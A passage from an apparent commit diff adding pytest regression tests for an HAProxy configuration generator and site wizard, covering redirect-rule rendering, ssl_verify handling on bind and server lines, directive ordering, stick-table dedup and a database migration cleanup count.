bad = "form.setFieldsValue({ ...initialValues, ...parsed });"
assert bad not in WIZARD_JS, (
f"Bulgu #v9 regression: {bad!r} reappeared. Use _mergeGroup-based "
"deep merge instead so old drafts pick up new initialValues defaults."
)
+339
View File
@@ -0,0 +1,339 @@
"""R11 (Round 11) — Site Wizard hotfix audit (PR-1 scope).
These tests guard the PR-1 hotfix bundle for the user-reported bug
where wizard-created entities (and pre-existing manually-created
entities after a wizard reject + apply cycle) failed HAProxy
validation with::
[ALERT] verify is enabled but no CA file specified for bind '...'
[WARNING] redirect rule parser error '(was '{code:'
[WARNING] http-request placed after use_backend will still be processed before
[WARNING] tcp-request placed after http-request ...
[WARNING] stick-table already declared
[ALERT] Fatal errors found in configuration
The PR-1 hotfix lives in:
- ``backend/services/haproxy_config.py``
* ``_format_redirect_rule`` helper (R11.A-1 redirect dict→string fix)
* ``_apply_bind_ssl_verify`` helper (R11.A-2 bind-side ssl_verify
safeguard — no client-CA → no `verify` directive emitted)
* ``_resolve_frontend_client_ca_path`` placeholder (forward-path
for PR-7 ssl_client_ca_certificate_id column)
* ``_categorize_haproxy_directive`` (R2.3 frontend-block emit
ordering buckets)
* Per-frontend bucket flush (`_fe_buckets`, `_emit_fe`) replacing
the prior in-place `config_lines.append(...)` calls so the
rendered block always emits in canonical HAProxy order:
prelude → stick → tcp-request → acl → http-request →
http-response → redirect → use_backend → default_backend.
* Stick-table emission dedup across frontend.rate_limit + WAF
rate_limit rules.
- ``backend/routers/site_wizard.py``
* ``_build_redirect_rules`` row schema (no URL in 'location' for
type=scheme; explicit 'scheme' field instead).
These are static-source assertions, NOT integration tests against a
real Postgres fixture — consistent with tests/test_proxied_host_*
peers in the suite. The integration coverage is in the apply path
itself (HAProxy `-c` validation runs in the agent).
"""
from __future__ import annotations
import re
from pathlib import Path
import pytest
_BACK = Path(__file__).resolve().parent.parent
_GEN = _BACK / "services" / "haproxy_config.py"
_ROUTER = _BACK / "routers" / "site_wizard.py"
def _gen_src() -> str:
if not _GEN.exists():
pytest.skip("services/haproxy_config.py not present")
return _GEN.read_text()
def _router_src() -> str:
if not _ROUTER.exists():
pytest.skip("routers/site_wizard.py not present")
return _ROUTER.read_text()
# ─────────────────────────────────────────────────────────────────────────────
# R11.A-1: redirect_rules dict → string fix + canonical scheme redirect schema
# ─────────────────────────────────────────────────────────────────────────────
def test_format_redirect_rule_helper_exists():
"""The helper that safely renders dict redirect rules into HAProxy
`redirect <type> ...` lines must exist. Pre-fix the generator
used `str(redirect)` which stringified dicts and produced
parser-fatal output."""
assert "def _format_redirect_rule(" in _gen_src(), (
"R11.A-1 regression: _format_redirect_rule helper missing"
)
def test_legacy_str_redirect_pattern_removed():
"""The pre-fix `str(redirect)` stringification must no longer be
present in the redirect-rules emit branch."""
src = _gen_src()
assert "redirect_text = str(redirect).strip()" not in src, (
"R11.A-1 regression: legacy `str(redirect)` stringification "
"reappeared — wizard-generated dict redirects will produce "
"parser-fatal HAProxy output."
)
def test_format_redirect_rule_renders_scheme_correctly():
"""Behavioural test: scheme-type redirect renders into proper
HAProxy ``redirect scheme <name> code <N> if <cond>`` syntax."""
import importlib.util
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
line = mod._format_redirect_rule({
"type": "scheme", "scheme": "https",
"code": 301, "condition": "!{ ssl_fc }",
})
assert line is not None
assert "redirect scheme https" in line
assert "code 301" in line
assert "if !{ ssl_fc }" in line
# No literal URL leaks (the pre-fix bug)
assert "https://" not in line, (
"R11.A-1 regression: redirect scheme rendered with URL — "
"HAProxy `redirect scheme` only accepts a literal scheme name."
)
def test_format_redirect_rule_renders_location_correctly():
import importlib.util
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
line = mod._format_redirect_rule({
"type": "location", "location": "/v2/login",
"code": 302, "condition": "",
})
assert "redirect location /v2/login" in line
assert "code 302" in line
def test_format_redirect_rule_skips_invalid():
import importlib.util
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
assert mod._format_redirect_rule(None) is None
assert mod._format_redirect_rule({"type": "unknown"}) is None
assert mod._format_redirect_rule({"type": "scheme", "scheme": "ftp"}) is None
assert mod._format_redirect_rule({"type": "location", "location": ""}) is None
def test_build_redirect_rules_no_location_key_for_scheme():
"""Wizard `_build_redirect_rules` must not emit a 'location' field
on a type=scheme rule (HAProxy parser fatal). Pre-fix the row
contained both 'type:scheme' and 'location:https://...' which
is the exact cause of the user-reported parser error."""
src = _router_src()
# The canonical HTTPS-redirect block in the helper must contain
# `"scheme": "https"` and must NOT contain a string starting with
# `https://` (URL leak).
# Round-13 audit: the original regex used `[^{]*?` which now
# collides with curly braces inside the Bulgu #29 docstring
# (e.g. `!{ ssl_fc }`). Locate the function body via slicing
# from `def _build_redirect_rules(` to the NEXT top-level `def`
# / EOF, then look for the canonical scheme/code/condition keys.
idx = src.find("def _build_redirect_rules(")
assert idx >= 0, "R11.A-1: _build_redirect_rules helper not found"
# Next top-level def OR end-of-file.
next_def = src.find("\ndef ", idx + 1)
body = src[idx:next_def if next_def != -1 else len(src)]
# Canonical scheme redirect must use the 'scheme' key
assert '"scheme": "https"' in body or "'scheme': 'https'" in body, (
"R11.A-1 regression: canonical HTTPS redirect must use the "
"'scheme: https' field (not a URL in 'location')."
)
# The pre-fix URL form must be gone
assert 'https://%[hdr(host)]' not in body, (
"R11.A-1 regression: pre-fix URL-as-location pattern remained "
"in _build_redirect_rules."
)
# ─────────────────────────────────────────────────────────────────────────────
# R11.A-2: bind-side ssl_verify safeguard
# ─────────────────────────────────────────────────────────────────────────────
def test_apply_bind_ssl_verify_helper_exists():
src = _gen_src()
assert "def _apply_bind_ssl_verify(" in src
assert "def _resolve_frontend_client_ca_path(" in src
def test_apply_bind_ssl_verify_skips_when_no_client_ca():
"""No client-CA path → no `verify` directive on the bind line.
This is the explicit safeguard for the user-reported fatal
HAProxy ALERT 'verify is enabled but no CA file specified'.
"""
import importlib.util
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
bind = " bind 0.0.0.0:443 ssl crt /etc/ssl/haproxy/foo.pem"
out = mod._apply_bind_ssl_verify(
bind, {"name": "fe", "ssl_verify": "required"}, cluster_id=1
)
assert "verify required" not in out, (
"R11.A-2 regression: `verify required` emitted without a "
"ca-file argument — would trigger HAProxy fatal ALERT."
)
assert out == bind
def test_apply_bind_ssl_verify_skips_when_none_or_empty():
import importlib.util
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
bind = " bind 0.0.0.0:443 ssl crt /etc/ssl/haproxy/foo.pem"
for val in (None, "", "none", "[]", "{}", "null"):
out = mod._apply_bind_ssl_verify(bind, {"name": "fe", "ssl_verify": val})
assert out == bind, (
f"R11.A-2: ssl_verify={val!r} should be a no-op on the bind line"
)
def test_apply_bind_ssl_verify_warns_on_unknown_value():
"""Defensive: unknown ssl_verify values must NOT be emitted (the
DB column had a stale 'true'/'false' default in some legacy
deployments — surfaced via warning only, not via parser-fatal
output)."""
import importlib.util
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
bind = " bind 0.0.0.0:443 ssl crt /etc/ssl/haproxy/foo.pem"
out = mod._apply_bind_ssl_verify(bind, {"name": "fe", "ssl_verify": "true"})
assert out == bind
# ─────────────────────────────────────────────────────────────────────────────
# R2.3: frontend-block emit ordering buckets
# ─────────────────────────────────────────────────────────────────────────────
def test_categorize_helper_exists():
src = _gen_src()
assert "def _categorize_haproxy_directive(" in src
def test_categorize_routes_directives_correctly():
import importlib.util
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
cases = [
(" acl is_admin path_beg /admin", "acl"),
(" stick-table type ip size 100k expire 30s store http_req_rate(10s)", "stick"),
(" http-request track-sc0 src", "http_req"),
(" http-request deny if X", "http_req"),
(" http-response add-header X-Frame-Options DENY", "http_resp"),
(" tcp-request inspect-delay 5s", "tcp_req"),
(" redirect scheme https code 301 if !{ ssl_fc }", "redirect"),
(" use_backend api_be if is_api", "use_be"),
(" default_backend web_be", "default_be"),
(" option httplog", "prelude"),
(" timeout client 30000ms", "prelude"),
(" maxconn 1000", "prelude"),
(" monitor-uri /healthz", "prelude"),
(" compression algo gzip", "prelude"),
(" log 127.0.0.1:514 local0 info", "prelude"),
]
for line, expected in cases:
got = mod._categorize_haproxy_directive(line)
assert got == expected, (
f"R2.3 regression: categorize({line!r}) = {got!r}, "
f"expected {expected!r}"
)
def test_emit_buckets_flushed_in_canonical_order():
"""The flush block at end of frontend processing must list buckets
in: prelude → stick → tcp_req → acl → http_req → http_resp →
redirect → use_be → default_be. Pre-fix `http-request` rules
interleaved with `use_backend` rules in source order, producing
HAProxy parser warnings."""
src = _gen_src()
flush_match = re.search(
r'for\s+_bucket_key\s+in\s+\(\s*'
r'"prelude"\s*,\s*'
r'"stick"\s*,\s*'
r'"tcp_req"\s*,\s*'
r'"acl"\s*,\s*'
r'"http_req"\s*,\s*'
r'"http_resp"\s*,\s*'
r'"redirect"\s*,\s*'
r'"use_be"\s*,\s*'
r'"default_be"\s*,?\s*\)',
src,
)
assert flush_match, (
"R2.3 regression: per-frontend bucket flush is missing or "
"buckets are listed in the wrong order. Canonical HAProxy "
"ordering is required to silence "
"'http-request placed after use_backend' warnings."
)
def test_no_direct_config_lines_append_inside_use_backend_emit():
"""Sanity: the use_backend / WAF / log_separate emit branches
must route through `_emit_fe(...)` so they end up in the right
bucket. A regression here would re-introduce the
out-of-order emit bug.
"""
src = _gen_src()
# Find the use_backend emit branch and inspect its body
idx = src.find("# Use Backend Rules")
assert idx >= 0, "use_backend emit branch missing entirely"
end = src.find("# Add WAF rules for this frontend", idx)
assert end > idx, "WAF emit branch missing"
body = src[idx:end]
# Inside this slice, emit must be via _emit_fe (no direct
# `config_lines.append` for rule_text).
assert "_emit_fe(f\" {rule_text}\")" in body, (
"R2.3 regression: use_backend rules no longer route through "
"_emit_fe — they will end up in source order, breaking "
"canonical bucket ordering."
)
# ─────────────────────────────────────────────────────────────────────────────
# R3.3: stick-table dedup
# ─────────────────────────────────────────────────────────────────────────────
def test_stick_table_dedup_safeguard_present():
src = _gen_src()
assert "_stick_table_emitted" in src, (
"R3.3 regression: stick-table dedup state variable missing — "
"multiple WAF rate_limit rules in the same frontend will "
"redeclare the table (HAProxy fatal 'stick-table already declared')."
)
assert "STICK-TABLE DEDUP" in src
@@ -0,0 +1,522 @@
"""R11 audit (post-PR-1 + post-PR-2) — bulgu remediation regression tests.
This file pins the behavioural fixes uncovered during the systematic
7-criteria audit of the PR-1 / PR-2 hotfix bundle. Each test maps to
a specific finding (FIX-N below) so a regression can be traced back
to the original audit note in chat history.
FIX-1 (Bug):
models/frontend.py::FrontendConfig.ssl_verify coerce was case
sensitive — `'OPTIONAL'`/`'REQUIRED'` survived the pre-validator
unchanged and were then REJECTED by the Literal, even though the
lowercase equivalent is a valid value. Inconsistent with the
sister coercers in `models/site_wizard.py` and the new
`models/backend.py` validator.
FIX-2 (Bug):
services/haproxy_config.py::_format_redirect_rule double-prepended
"if" when the caller passed `condition="if !{ ssl_fc }"`,
producing the parser-fatal line `redirect scheme https code 301
if if !{ ssl_fc }`.
FIX-3 (Bug):
database/migrations.py PR-2 cleanup used `fetchval()` against a
CTE+RETURNING multi-row UPDATE — only the first row id surfaced
in the log, masking the true cleanup count. Operators relying on
the migration log to count touched rows would be misled.
FIX-4 (Test gap):
No test exercised `_format_redirect_rule` with `type='prefix'`,
`code` passed as a string (`'301'`), or the leading-`if` edge.
FIX-5 (Test gap):
No behavioural test for the `_categorize_haproxy_directive` edge
cases (empty line / WAF comment / `mode http` direct emit).
FIX-8 (Test gap):
ServerConfig coerce only had lowercase coverage; uppercase
variants were untested.
"""
from __future__ import annotations
from pathlib import Path
import importlib.util
import pytest
from pydantic import ValidationError
_BACK = Path(__file__).resolve().parent.parent
_GEN = _BACK / "services" / "haproxy_config.py"
def _load_gen():
spec = importlib.util.spec_from_file_location("_haproxy_cfg", _GEN)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
return mod
# ─────────────────────────────────────────────────────────────────────────────
# FIX-1: FrontendConfig case-insensitive ssl_verify coerce
# ─────────────────────────────────────────────────────────────────────────────
def test_frontend_config_ssl_verify_uppercase_coerces():
"""`'OPTIONAL'`, `'REQUIRED'`, `'NONE'` (any case) must coerce to
the canonical lowercase Literal value, not be rejected."""
from models.frontend import FrontendConfig
cases = {
"OPTIONAL": "optional",
"Optional": "optional",
"REQUIRED": "required",
"Required": "required",
"NONE": "none",
"None": "none",
" Optional ": "optional", # surrounding whitespace
}
for raw, expected in cases.items():
m = FrontendConfig(name="fe", bind_port=80, ssl_verify=raw)
assert m.ssl_verify == expected, (
f"FIX-1 regression: ssl_verify={raw!r} should coerce to "
f"{expected!r}, got {m.ssl_verify!r}"
)
def test_frontend_config_ssl_verify_garbage_still_rejected():
"""Coerce must NOT swallow garbage — only canonical values pass."""
from models.frontend import FrontendConfig
for bad in ("yes", "true", "1", "verify", "Optional!"):
with pytest.raises(ValidationError):
FrontendConfig(name="fe", bind_port=80, ssl_verify=bad)
# ─────────────────────────────────────────────────────────────────────────────
# FIX-2: _format_redirect_rule duplicate-`if` guard
# ─────────────────────────────────────────────────────────────────────────────
def test_format_redirect_rule_no_duplicate_if():
"""Caller-provided ``condition='if X'`` must NOT result in
``... if if X`` in the rendered line."""
mod = _load_gen()
line = mod._format_redirect_rule({
"type": "scheme", "scheme": "https", "code": 301,
"condition": "if !{ ssl_fc }",
})
assert line is not None
assert " if if " not in line, (
f"FIX-2 regression: duplicate 'if' guard missing — rendered "
f"line was {line!r}"
)
# The single 'if !{ ssl_fc }' must still be present
assert "if !{ ssl_fc }" in line
def test_format_redirect_rule_unless_clause():
"""`unless` is the only other valid HAProxy condition prefix —
treat it the same as a leading 'if '."""
mod = _load_gen()
line = mod._format_redirect_rule({
"type": "scheme", "scheme": "https", "code": 301,
"condition": "unless { ssl_fc }",
})
assert line is not None
# Must NOT prepend 'if' before 'unless'
assert "if unless" not in line
assert "unless { ssl_fc }" in line
def test_format_redirect_rule_naked_condition_gets_if_prefix():
"""A bare condition (no leading 'if'/'unless') must still get the
'if ' prefix prepended."""
mod = _load_gen()
line = mod._format_redirect_rule({
"type": "scheme", "scheme": "https", "code": 301,
"condition": "!{ ssl_fc }",
})
assert "if !{ ssl_fc }" in line
def test_format_redirect_rule_prefix_type():
"""FIX-4: `type='prefix'` was never exercised by tests."""
mod = _load_gen()
line = mod._format_redirect_rule({
"type": "prefix", "prefix": "/v2",
"code": 301, "condition": "",
})
assert "redirect prefix /v2" in line
assert "code 301" in line
def test_format_redirect_rule_code_as_string():
"""FIX-4: callers that JSON-decode an old wizard payload may
deliver `code` as the string `'301'`. The helper must coerce
it to int and emit `code 301`."""
mod = _load_gen()
line = mod._format_redirect_rule({
"type": "scheme", "scheme": "https", "code": "301",
})
assert "code 301" in line
def test_format_redirect_rule_invalid_code_dropped():
"""Invalid `code` values must be dropped (logged), not rendered."""
mod = _load_gen()
line = mod._format_redirect_rule({
"type": "scheme", "scheme": "https", "code": "not-an-int",
})
# The line is still rendered — just without the `code <N>` part
assert "redirect scheme https" in line
assert "code" not in line, (
"FIX-4 regression: invalid 'code' value should be dropped "
"(logged) rather than rendered as `code not-an-int`."
)
# ─────────────────────────────────────────────────────────────────────────────
# FIX-5: _categorize_haproxy_directive edge cases
# ─────────────────────────────────────────────────────────────────────────────
def test_categorize_empty_line_safe():
"""Empty / whitespace-only lines must not crash the categorizer."""
mod = _load_gen()
assert mod._categorize_haproxy_directive("") == "prelude"
assert mod._categorize_haproxy_directive(" ") == "prelude"
assert mod._categorize_haproxy_directive("\t\n") == "prelude"
def test_categorize_waf_comment_routes_to_acl():
"""WAF marker comments stick to the same bucket as the ACL/HTTP
rules they describe so the rendered config is grouped sanely."""
mod = _load_gen()
assert mod._categorize_haproxy_directive(" # WAF Rule: foo (Priority: 100)") == "acl"
assert mod._categorize_haproxy_directive(" # IP Filter Log: blocked") == "acl"
assert mod._categorize_haproxy_directive(" # Rate Limit Log: x") == "acl"
assert mod._categorize_haproxy_directive(" # Header Filter Log: x") == "acl"
def test_categorize_unknown_directive_falls_to_prelude():
"""An unrecognised line goes to 'prelude' so it appears early
in the rendered block — operators see it and the validator
surfaces it as a warning rather than silently dropping it."""
mod = _load_gen()
assert mod._categorize_haproxy_directive(" weird-haproxy-keyword xyz") == "prelude"
# ─────────────────────────────────────────────────────────────────────────────
# FIX-9: WAF custom-comment keywords route to the 'acl' bucket
# ─────────────────────────────────────────────────────────────────────────────
def test_categorize_waf_custom_comment_keywords_route_to_acl():
"""Pre-fix the heuristic only matched 5 keywords (`waf rule:`,
`ip filter`, `rate limit`, `header filter`, `request filter`).
`# Log Message: ...`, `# Custom Log: ...`, `# Custom Condition
for ...` and `# Filter Log: ...` were mis-routed to 'prelude',
visually disconnecting the comment from the rule it
documents."""
mod = _load_gen()
cases = [
" # Log Message: blocked by xyz",
" # Custom Log: bot detected",
" # Custom Condition for foo",
" # IP Filter Log: deny rule for x",
]
for line in cases:
assert mod._categorize_haproxy_directive(line) == "acl", (
f"FIX-9 regression: {line!r} should route to 'acl' bucket "
f"alongside the rule it documents."
)
# ─────────────────────────────────────────────────────────────────────────────
# FIX-10: BACKEND-MODE-WARNING comments route to the 'default_be' bucket
# ─────────────────────────────────────────────────────────────────────────────
def test_categorize_backend_mode_warning_routes_to_default_be():
"""Mode-mismatch warnings use the BACKEND-MODE-WARNING marker
so the comment emits NEXT TO the default_backend directive,
not at the top of the frontend block (operator UX)."""
mod = _load_gen()
line = " # BACKEND-MODE-WARNING: Backend 'be' has mode 'tcp' but frontend has mode 'http'"
assert mod._categorize_haproxy_directive(line) == "default_be", (
"FIX-10 regression: BACKEND-MODE-WARNING comments must route "
"to 'default_be' bucket so they emit next to the directive "
"they describe."
)
def test_generator_uses_backend_mode_warning_marker():
"""The generator must use the BACKEND-MODE-WARNING marker (not
the legacy `# WARNING: ...` text) so the categorize heuristic
can find them. Pre-fix the comments matched no heuristic
keyword and landed in the 'prelude' bucket far above the
actual default_backend directive."""
src = _GEN.read_text()
assert "# BACKEND-MODE-WARNING:" in src, (
"FIX-10 regression: mode-mismatch comments lost the marker "
"and will route to 'prelude' instead of 'default_be'."
)
# ─────────────────────────────────────────────────────────────────────────────
# FIX-11: _format_redirect_rule legacy double-prefix guard
# ─────────────────────────────────────────────────────────────────────────────
def test_format_redirect_rule_legacy_string_no_double_prefix():
"""Legacy DB rows from earlier releases sometimes stored the
FULL `redirect <type> ...` line including the leading
'redirect ' keyword. Without the guard the helper would
prepend a second 'redirect '."""
mod = _load_gen()
line = mod._format_redirect_rule("redirect scheme https if !{ ssl_fc }")
assert line is not None
# The single 'redirect ' prefix must be present exactly once
assert line.count("redirect ") == 1, (
f"FIX-11 regression: double 'redirect' prefix in {line!r}"
)
assert "redirect scheme https" in line
def test_format_redirect_rule_naked_legacy_string_unchanged():
"""A bare legacy entry (`scheme https if !{ ssl_fc }`) without
the leading keyword must still get a single 'redirect '
prefix prepended — the FIX-11 strip must NOT regress this."""
mod = _load_gen()
line = mod._format_redirect_rule("scheme https if !{ ssl_fc }")
assert line is not None
assert line.count("redirect ") == 1
assert "redirect scheme https if !{ ssl_fc }" in line
def test_format_redirect_rule_empty_after_keyword_strip():
"""`'redirect '` (just the keyword + whitespace) must skip
cleanly rather than rendering an empty `' redirect '`."""
mod = _load_gen()
assert mod._format_redirect_rule("redirect ") is None
assert mod._format_redirect_rule("redirect ") is None
# ─────────────────────────────────────────────────────────────────────────────
# FIX-12: BIND SSL_VERIFY DOWNGRADE log message hygiene
# ─────────────────────────────────────────────────────────────────────────────
def test_apply_bind_ssl_verify_log_no_dead_link_to_unimplemented_ui():
"""Pre-fix the diagnostic log pointed operators at a UI path
('Frontend Management → Advanced TLS') that does not exist
until PR-7 — operators followed the hint, hit a dead end, and
reported the safeguard as a bug. The new message offers a
concrete current-release action AND notes the upcoming
column."""
src = _GEN.read_text()
# The dead-link phrase must be gone
assert "via Frontend Management → Advanced TLS" not in src, (
"FIX-12 regression: BIND SSL_VERIFY DOWNGRADE log message "
"still references 'Frontend Management → Advanced TLS' "
"which does not exist on the current release."
)
# The actionable hint must be present
assert "set ssl_verify='none'" in src, (
"FIX-12 regression: BIND SSL_VERIFY DOWNGRADE log message "
"must offer a concrete current-release action "
"(set ssl_verify='none') instead of a dead UI link."
)
# ─────────────────────────────────────────────────────────────────────────────
# FIX-13: uppercase 'NONE' / 'OPTIONAL' / sentinel in bind safeguard
# ─────────────────────────────────────────────────────────────────────────────
def test_apply_bind_ssl_verify_uppercase_none_skips():
"""`'NONE'` (uppercase / mixed case) is one of the legacy
sentinel values that older clients sent. The helper must
treat it as 'no verify directive' regardless of case."""
mod = _load_gen()
bind = " bind 0.0.0.0:443 ssl crt /etc/ssl/haproxy/foo.pem"
for raw in ("NONE", "None", "none", " None "):
out = mod._apply_bind_ssl_verify(bind, {"name": "fe", "ssl_verify": raw})
assert out == bind, (
f"FIX-13: ssl_verify={raw!r} should be a no-op on the bind line "
"(case-insensitive 'none' check)"
)
# ─────────────────────────────────────────────────────────────────────────────
# Asymmetric server-side vs frontend-side ssl_verify behavior pin
# ─────────────────────────────────────────────────────────────────────────────
def test_server_side_emits_explicit_verify_none_downgrade():
"""Sanity pin: server-side mTLS downgrade explicitly emits
'verify none' (because HAProxy 2.8+ defaults server SSL to
'verify required' which would FAIL without a CA). Frontend-
side instead SKIPS the directive entirely (HAProxy default
is 'verify none' on bind). This asymmetry is intentional;
the test exists to prevent a future maintainer from
mistakenly "harmonising" the two paths and breaking server
SSL reload."""
src = _GEN.read_text()
# Server-side path must contain explicit 'verify none' downgrade
assert 'server_line += " verify none"' in src, (
"Asymmetry regression: server-side ssl_verify downgrade must "
"EXPLICITLY emit 'verify none' (HAProxy 2.8+ default is "
"'verify required' on server SSL — skipping the directive "
"would break upstream connections)."
)
# And the bind-side path must NOT have a 'verify none' fallback
# (frontend bind defaults to 'verify none' so a skip is safe).
# Look for the safeguard helper signature instead:
assert "def _apply_bind_ssl_verify(" in src
# There must NOT be an explicit 'bind_line += " verify none"'
# anywhere (would defeat the safeguard's no-op-on-skip
# contract).
assert 'bind_line += " verify none"' not in src, (
"Asymmetry regression: bind-side path should SKIP the "
"verify directive when no client-CA is resolvable — emitting "
"'verify none' would be a behaviour change."
)
# ─────────────────────────────────────────────────────────────────────────────
# FIX-5: _emit_fe / stick-table dedup runtime test (best-effort)
# ─────────────────────────────────────────────────────────────────────────────
def test_stick_table_dedup_logic_via_helper_inspection():
"""The dedup logic lives inside a closure (`_emit_fe`) so a
direct behavioural call requires building a partial frontend
fixture. Instead, inspect the source to confirm the dedup
branch keeps the FIRST `stick-table` line and discards
subsequent ones.
Phase K Phase D follow-up (Bulgu #13) updated this test from
"track-sc0 is NOT dedup'ed" to "track-sc0 IS dedup'ed". The
rationale: HAProxy only needs one tracking call per frontend;
every additional `http-request track-sc0 src` is a redundant
state-table operation per request. The per-rule
`http-request deny if { sc_http_req_rate(0) gt N }` lines are
NOT dedup'ed because each WAF rule has its own threshold and
must still emit.
"""
src = _GEN.read_text()
# The dedup must check `startswith("stick-table")` specifically,
# so other 'stick' keywords (e.g. 'stick on src') are NOT
# incorrectly suppressed. The exact expression now lives on the
# `stripped` local but the membership check is preserved.
assert 'startswith("stick-table")' in src, (
"FIX-5 regression: dedup branch must scope to `stick-table` "
"specifically so non-table 'stick' directives still emit."
)
# The dedup must short-circuit ONLY when already emitted, not
# always.
assert "if _stick_table_emitted" in src and "startswith(\"stick-table\")" in src, (
"FIX-5 regression: stick-table dedup must be conditional on "
"the `_stick_table_emitted` flag."
)
# Bulgu #13 — track-sc<N> dedup must ALSO be present. Round-2
# refinement: dedup is now scoped to the full (counter, fetch)
# signature so `track-sc0 src` and `track-sc0 dst` collapse
# independently. Accept either the legacy single-flag layout
# or the new signature-set layout.
assert (
"_track_sc_signatures" in src
or "_track_sc0_emitted" in src
), (
"Bulgu #13 regression: track-sc dedup state is missing — "
"every WAF rate-limit rule will emit a redundant "
"`http-request track-sc<N> <fetch>` line into the frontend block."
)
assert 'startswith("http-request track-sc")' in src, (
"Bulgu #13 regression: track-sc dedup must scope to the "
"track-sc<N> directive family specifically; otherwise unrelated "
"http-request rules may be incorrectly suppressed."
)
# ─────────────────────────────────────────────────────────────────────────────
# FIX-8: ServerConfig uppercase ssl_verify coerce
# ─────────────────────────────────────────────────────────────────────────────
def test_server_config_ssl_verify_uppercase_coerces():
"""`'NONE'` / `'REQUIRED'` (any case) must coerce to the
canonical lowercase Literal value."""
from models.backend import ServerConfig
base = dict(server_name="srv", server_address="10.0.0.1", server_port=80)
for raw, expected in (("NONE", "none"), ("None", "none"),
("REQUIRED", "required"), ("Required", "required")):
m = ServerConfig(**base, ssl_verify=raw)
assert m.ssl_verify == expected
def test_server_config_uppercase_optional_coerces_to_none():
"""`'OPTIONAL'` (any case) is invalid server-side — coerce to
None, do NOT render an invalid `verify optional` directive."""
from models.backend import ServerConfig
base = dict(server_name="srv", server_address="10.0.0.1", server_port=80)
for raw in ("OPTIONAL", "Optional", "optional"):
m = ServerConfig(**base, ssl_verify=raw)
assert m.ssl_verify is None
# ─────────────────────────────────────────────────────────────────────────────
# FIX-3: Migration cleanup count parser
# ─────────────────────────────────────────────────────────────────────────────
def test_migration_cleanup_uses_execute_not_fetchval():
"""The pre-fix code path used `fetchval()` with a CTE+RETURNING
multi-row UPDATE, surfacing only the first row's id and
masking the true count. Switched to `execute()` + status-tag
parse for accurate operator-facing reporting."""
src = (_BACK / "database" / "migrations.py").read_text()
# The legacy code-line pattern (executable, not in a comment)
# must be gone. We strip Python comments before searching so the
# historical-context comment block in `migrations.py` doesn't
# trigger a false positive.
code_only = "\n".join(
line for line in src.splitlines()
if not line.lstrip().startswith("#")
)
assert "RETURNING f.id" not in code_only, (
"FIX-3 regression: legacy `RETURNING f.id` from the cleanup "
"block reappeared — `fetchval` only surfaces the first row id."
)
# And `cleanup_count = await conn.fetchval(` (the legacy invocation
# for this exact block) must not be present either.
assert "cleanup_count = await conn.fetchval(" not in code_only, (
"FIX-3 regression: legacy `fetchval()` invocation for the "
"ssl_verify cleanup block reappeared."
)
# The new pattern must be present
assert "cleanup_status = await conn.execute(" in src, (
"FIX-3 regression: cleanup must use `execute()` so the "
"asyncpg status tag (`'UPDATE N'`) can be parsed for the "
"true row count."
)
assert 'int(str(cleanup_status).split()[-1])' in src, (
"FIX-3 regression: cleanup count parse from asyncpg status "
"tag is missing — operator log will not surface the true "
"number of rows touched."
)
@@ -0,0 +1,227 @@
"""R11 PR-2 — ssl_verify Pydantic Literal unification + DB default flip.
Pre-PR-2 state:
- `models/frontend.py::FrontendConfig.ssl_verify` was `Optional[str]`
so any string passed validation, including legacy `'true'` /
`'false'` / `'1'` and obsolete UI artifacts. The HAProxy generator
later rendered the value verbatim, producing parser-fatal output.
- `models/backend.py::ServerConfig.ssl_verify` was also `Optional[str]`.
- `models/site_wizard.py::ServerStep.ssl_verify` had a strict
Literal but no empty-string coercion — so the React form's
cleared select (`''`) raised a ValidationError on every save.
- `models/site_wizard.py::SSLChoice.ssl_verify` likewise lacked
coercion.
- `database/migrations.py` set ``DEFAULT 'optional'`` for the
frontends.ssl_verify column at table creation AND on
ADD-COLUMN-on-existing-table paths. Combined with a missing
client-CA column, this is the root cause of the user-reported
fatal HAProxy ALERT after a wizard reject + apply cycle.
PR-2 fix:
- All four models accept the same canonical Literal set. The
server-side server-line uses `{'none','required'}` (HAProxy
server SSL has no `optional`); the bind-side uses
`{'none','optional','required'}`.
- All four have a `pre`/`mode='before'` validator that coerces
`''` and sentinel values (`'[]'`, `'{}'`, `'null'`) to None.
- `migrations.py` drops the `DEFAULT 'optional'` clause on both the
CREATE TABLE definition and the in-place ALTER ADD COLUMN line,
AND adds a one-shot cleanup that:
* drops the column DEFAULT in-place on already-deployed DBs,
* NULLs out any rows whose ssl_verify is outside the canonical
Literal set (preserving legitimate operator-set values).
"""
from __future__ import annotations
from pathlib import Path
import pytest
from pydantic import ValidationError
_BACK = Path(__file__).resolve().parent.parent
# ─────────────────────────────────────────────────────────────────────────────
# Frontend (manual create endpoint)
# ─────────────────────────────────────────────────────────────────────────────
def test_frontend_config_ssl_verify_is_strict_literal():
from models.frontend import FrontendConfig
# Valid values → accepted
for v in ("none", "optional", "required"):
m = FrontendConfig(name="fe", bind_port=80, ssl_verify=v)
assert m.ssl_verify == v
# Invalid free-form string → rejected.
# NOTE (R11-audit FIX-1): the case-insensitive coercer accepts
# `'REQUIRED'`/`'OPTIONAL'`/`'NONE'` and lower-cases them to the
# canonical Literal value. So we test only values that are
# genuinely off-vocabulary.
for bad in ("true", "false", "1", "yes", "Optional!"):
with pytest.raises(ValidationError):
FrontendConfig(name="fe", bind_port=80, ssl_verify=bad)
def test_frontend_config_ssl_verify_empty_coerces_to_none():
from models.frontend import FrontendConfig
for empty in ("", "[]", "{}", "null"):
m = FrontendConfig(name="fe", bind_port=80, ssl_verify=empty)
assert m.ssl_verify is None, (
f"PR-2 R11.B regression: ssl_verify={empty!r} should coerce "
"to None (UI form clear) — got {m.ssl_verify!r}"
)
